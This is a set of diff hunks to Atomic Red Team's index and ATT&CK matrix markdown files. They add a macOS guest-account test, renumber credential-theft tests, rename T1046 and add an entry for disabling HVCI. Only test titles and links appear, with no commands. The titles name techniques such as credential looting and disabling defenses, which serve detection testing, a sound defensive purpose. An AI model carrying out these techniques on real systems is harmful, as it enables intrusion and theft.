- Atomic Test #1: Port Scan [linux, macos]
|
||||
- Atomic Test #2: Port Scan Nmap [linux, macos]
|
||||
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
@@ -80,7 +80,8 @@
|
||||
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
|
||||
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
|
||||
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [macos, linux]
|
||||
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
|
||||
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
|
||||
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -256,7 +257,8 @@
|
||||
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
|
||||
- Atomic Test #1: Launch Daemon [macos]
|
||||
- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
|
||||
- Atomic Test #1: Trap EXIT [macos, linux]
|
||||
- Atomic Test #2: Trap SIGINT [macos, linux]
|
||||
@@ -345,7 +347,8 @@
|
||||
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
|
||||
- Atomic Test #1: Launch Daemon [macos]
|
||||
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
|
||||
- Atomic Test #1: Trap EXIT [macos, linux]
|
||||
- Atomic Test #2: Trap SIGINT [macos, linux]
|
||||
@@ -437,9 +440,10 @@
|
||||
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
|
||||
- Atomic Test #1: Search Through Bash History [linux, macos]
|
||||
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
|
||||
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
|
||||
- Atomic Test #2: Extract passwords with grep [macos, linux]
|
||||
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
|
||||
- Atomic Test #1: Find AWS credentials [macos, linux]
|
||||
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
|
||||
- Atomic Test #3: Extract passwords with grep [macos, linux]
|
||||
- Atomic Test #6: Find and Access Github Credentials [macos, linux]
|
||||
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -517,7 +521,7 @@
|
||||
- [T1018 Remote System Discovery](../../T1018/T1018.md)
|
||||
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
|
||||
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
|
||||
- [T1046 Network Service Scanning](../../T1046/T1046.md)
|
||||
- [T1046 Network Service Discovery](../../T1046/T1046.md)
|
||||
- Atomic Test #1: Port Scan [linux, macos]
|
||||
- Atomic Test #2: Port Scan Nmap [linux, macos]
|
||||
- [T1518 Software Discovery](../../T1518/T1518.md)
|
||||
@@ -670,7 +674,8 @@
|
||||
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
@@ -370,6 +370,7 @@
|
||||
- Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
|
||||
- Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
|
||||
- Atomic Test #38: Delete Windows Defender Scheduled Tasks [windows]
|
||||
- Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
|
||||
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1308,14 +1309,14 @@
|
||||
- Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
|
||||
- Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
|
||||
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
|
||||
- Atomic Test #3: Extracting passwords with findstr [windows]
|
||||
- Atomic Test #4: Access unattend.xml [windows]
|
||||
- Atomic Test #6: WinPwn - sensitivefiles [windows]
|
||||
- Atomic Test #7: WinPwn - Snaffler [windows]
|
||||
- Atomic Test #8: WinPwn - powershellsensitive [windows]
|
||||
- Atomic Test #9: WinPwn - passhunt [windows]
|
||||
- Atomic Test #10: WinPwn - SessionGopher [windows]
|
||||
- Atomic Test #11: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
|
||||
- Atomic Test #4: Extracting passwords with findstr [windows]
|
||||
- Atomic Test #5: Access unattend.xml [windows]
|
||||
- Atomic Test #7: WinPwn - sensitivefiles [windows]
|
||||
- Atomic Test #8: WinPwn - Snaffler [windows]
|
||||
- Atomic Test #9: WinPwn - powershellsensitive [windows]
|
||||
- Atomic Test #10: WinPwn - passhunt [windows]
|
||||
- Atomic Test #11: WinPwn - SessionGopher [windows]
|
||||
- Atomic Test #12: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
|
||||
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1552.006 Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md)
|
||||
- Atomic Test #1: GPP Passwords (findstr) [windows]
|
||||
@@ -1544,7 +1545,7 @@
|
||||
- Atomic Test #18: Get-DomainController with PowerView [windows]
|
||||
- Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
|
||||
- Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
|
||||
- [T1046 Network Service Scanning](../../T1046/T1046.md)
|
||||
- [T1046 Network Service Discovery](../../T1046/T1046.md)
|
||||
- Atomic Test #3: Port Scan NMap for Windows [windows]
|
||||
- Atomic Test #4: Port Scan using python [windows]
|
||||
- Atomic Test #5: WinPwn - spoolvulnscan [windows]
|
||||
|
||||
@@ -29,7 +29,7 @@
|
||||
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
|
||||
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) | | | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Non-Standard Port](../../T1571/T1571.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
|
||||
@@ -9,20 +9,20 @@
|
||||
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Unsecured Credentials](../../T1552/T1552.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
